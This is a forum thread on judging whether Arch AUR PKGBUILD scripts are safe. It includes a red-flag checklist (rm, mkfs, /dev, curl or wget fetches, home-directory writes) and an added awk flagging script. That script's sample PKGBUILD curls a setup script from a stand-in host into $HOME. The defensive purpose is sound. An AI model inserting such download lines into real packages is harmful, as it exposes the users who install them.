AUR PKGBUILDs

So AUR PKGBUILDs are shell scripts? For someone who doesn’t know any shell scripting how do you decide if it’s safe to install them?

For now all of the packages I need have a lot of votes so I assume they’re pretty safe.

I always read them because the Arch wiki advises to read them. But I only understand some of it if it’s simple enough.

Makes sense when they say Arch is not for the average user :confused:

This is like a rhetorical question I know. Still, I’d like your input. Thanks.

Depends on what’s inside and how the code is built…
PKGBUILDs themselves are not the issue for security, but the rest of the code can be, in theory.

The only way to be 100% sure is to manually review the code. I do that, for example:

  1. Initially, if I need something from the AUR, I manually check all files
  2. Then just diff on updates, to see changes!

1 Like

When you say manually review code do you mean package builds or the actual source code?

Actual source (well unless it’s something like outdated proprietary Nvidia drivers of course :sweat_smile:)

I have found so far that a kind of osmosis takes place, and after a few months you almost ‘get a feel’ for what the PKGBUILD is doing. If something makes you wonder, that’s what the forums are for!

Another thing that you might find is that there are options within the PKGBUILD for features that you might wish to include, or exclude from your build of the application. For instance, in the package conky-cairo, there are a number of ‘flags’ that control whether there is special handling for nVidia GPUs, and whether the Audacious music player includes special features too (among others). Normally these (if present) will be explained in lines that start with a # character… this denotes a comment, and does nothing except inform the reader of whatever it refers to.

The other thing you can do is “DuckDuckGo” (well - internet search) the name of the package you are considering - issues will often show up there if significant!

2 Likes

But it’s like having to learn so many different languages. I’m currently learning JS :woozy_face:

1 Like

You don’t - you stick to the repo packages. :wink:

3 Likes

Okay. So I’m still fine to use them then. If I need any clarification I will ask here for assistance. I will actually learn shell scripting but I don’t wanna learn multiple languages at the same time.

No worries, we all start somewhere.
But like I’ve said, it’s the only 100% way to be sure, and not rely on someone else’s judgement…

I think you’ll find (over time) that computer languages are easier to learn than human ones! After all - there is a limited number of things they are trying to do - which helps…

2 Likes

Thanks guys I’m glad I asked. You guys are awesome. But still I should prolly go and ask on Arch forums too :rofl:

Edit: Relax just kidding

1 Like

Be aware (be VERY aware) that the answer may well include RTFM (read the “fine” manual) or at best a link to the Arch wiki… :grin: Try the questions here first!

2 Likes

I was kidding I should have put an /s there. I have never participated in a forum this much in my entire life. Well not participate I mean ask many questions. :grin:

Thinking of asking there gives me the same feeling that I get when I look down from 50 storey building.

@keybreak and @freebird54 have solved my problem but I can’t decide to choose the solution :face_with_raised_eyebrow:

Hmm - undecided fits as name then?? :smile: Don’t think it matters…

2 Likes

Lmao! well when I first created this forum account it was meant to be a throwaway account. So I didn’t even use my real email address and had the username jonny (Just came to my head at the time). Now that I’ve spent time here I have decided to stay. But I haven’t decided on a username yet.

I was thinking of creating a new account and asking a mod to anonymize my account so the actual content remains.

Edit: You are a mod! Reckon you can do it for me?

  • First of all, look up the package on aur.archlinux.org, see the comments, upvotes, popularity, name of the packager, etc… If it is not a popular package, be extra careful when inspecting the PKGBUILD file. Look at the date the package was last updated. If it is fairly old, or updated by the same person, and people are using it, it’s almost certainly safe. If there is anything fishy going on, it will be removed from the AUR fairly quickly.

What to look for in the PKGBUILD file? You’ll have to learn some elementary shell scripting to understand what’s going on. This is easier than it sounds.

  • Inspect even the PKGBUILD files for completely trustworthy packages, just so you learn to recognise a good PKGBUILD file. When you see a dozen good PKGBUILD files and you understand what’s going on there, you’ll already have the feeling for anything that is out of place.

  • Look for anything obviously malicious, like rm, mv commands, any output redirection, any mention of /dev (like /dev/null, /dev/sda, /dev/zero, /dev/random), mkfs, any call to pacman, systemctl, anything that touches grub… stuff like that.

  • Look for any command that does stuff in your home directory. Typically, building and installing packages should not touch anything in the home directory. If you find something like that, be very suspicious and make sure you completely understand what that command does.

  • Look for anything that looks intentionally obfuscated. Anything that is written in an unclear way, with many semicolons, &&s and ||s, lots of brackets, sed, awk, etc… Typically, good PKGBUILDs contain very simple instructions.

  • Make sure the software comes from a trustworthy place, whether it’s a binary distribution or the source code. Check all the URLs in the script, make sure they are official pages for the software you’re installing. All URLs should be listed neatly in the beginning of the file. Look for any downloads of external scripts, with curl or wget, there should not be anything like that. Beware of random Github places.

  • Use common sense.

Also, when you install something from the AUR, make sure to upvote it on aur.archlinux.org, just to let everyone know it’s a good package. If you notice anything malicious, do not neglect to report it. Upvoting good packages and reporting bad ones is the easiest way to improve the AUR for everyone.

The AUR is one of the safest ways to install software, just because it is so transparent. But it does not tolerate just looking up the package in Pamac and clicking on the Build button, or doing yay package_name blindly. It requires that the user knows what’s going on. That’s why I recommend trying to build at least one package manually, to understand what’s going on, before using an AUR helper like pamac or yay.

yay has a nice feature that allows you to inspect a PKGBUILD file before installing, and to see the differences in the PKGBUILD file when updating a package from the AUR. Do not ignore this feature, it is very useful and will make your AUR usage much safer.

7 Likes
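The checklist in the post above and the "diff on updates" habit from earlier in the thread, combined into a reading aid. This is an added example, not code from any poster or from the AUR: `flag_pkgbuild`, `write_samples`, `demo` and the `demo-tool` package are hypothetical, the sample PKGBUILDs are constructed, and the "dense line" threshold of 3 is an assumption.

```shell
#!/bin/sh
# A hit means "read and understand this line", not "malicious";
# no hits does not mean "safe". Patterns follow the checklist in the post.

# flag_pkgbuild NEW [OLD] -> prints LINE:CATEGORY:TEXT; with OLD, only lines new in NEW
flag_pkgbuild() {
    awk '
    function hit(cat) { printf "%d:%s:%s\n", FNR, cat, $0 }
    ARGC > 2 && FILENAME == ARGV[1] { seen[$0] = 1; next }  # remember the old version
    /^[ \t]*#/ || ($0 in seen) { next }                     # skip comments and unchanged lines
    /(^|[^A-Za-z0-9_-])(rm|mv|mkfs[.a-z0-9]*|pacman|systemctl|grub[-a-z0-9]*)([^A-Za-z0-9_-]|$)/ { hit("command") }
    /(^|[^A-Za-z0-9_-])(curl|wget)([^A-Za-z0-9_-]|$)/       { hit("download") }
    /\/dev\//                                               { hit("device") }
    /[$]HOME|[$][{]HOME[}]|~\/|\/home\//                    { hit("home") }
    />([^=]|$)/                                             { hit("redirect") }
    { s = $0; if (gsub(/;|&&|\|\|/, "&", s) >= 3) hit("dense") }  # threshold is an assumption
    ' ${2:+"$2"} "$1"
}

# write_samples DIR -> constructed PKGBUILD.old / PKGBUILD.new (not a real package)
write_samples() {
    cat > "$1/PKGBUILD.old" <<'EOF'
pkgname=demo-tool
pkgver=1.0
source=("https://example.org/demo-tool-$pkgver.tar.gz")
depends=('glibc>=2.30')
package() {
  make -C "$srcdir/demo-tool-$pkgver" DESTDIR="$pkgdir" install
}
EOF
    cat > "$1/PKGBUILD.new" <<'EOF'
pkgname=demo-tool
pkgver=1.1
source=("https://example.org/demo-tool-$pkgver.tar.gz")
depends=('glibc>=2.30')
package() {
  make -C "$srcdir/demo-tool-$pkgver" DESTDIR="$pkgdir" install
  curl -s https://example.invalid/setup.sh -o "$HOME/.cache/setup.sh"
  rm -rf "$pkgdir/usr/share/doc"
}
EOF
}

# Stand-alone run: review only what the constructed update added
demo() { d=$(mktemp -d); write_samples "$d"; flag_pkgbuild "$d/PKGBUILD.new" "$d/PKGBUILD.old"; rm -rf "$d"; }
demo
```

On the sample update it reports line 7 (a download that writes into the home directory) and line 8 (an `rm` that stays inside `$pkgdir`, which is normal packaging cleanup); telling those two apart is still the reader's job.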

Thanks so much @Kresimir I now have somewhat a better understanding. I have built packages manually well on Arch you got no choice because you have to build yay.

I think I’m gonna learn at least basic shell scripting so I can make an informed decision. Also I will follow the advice given here by you and the others.

1 Like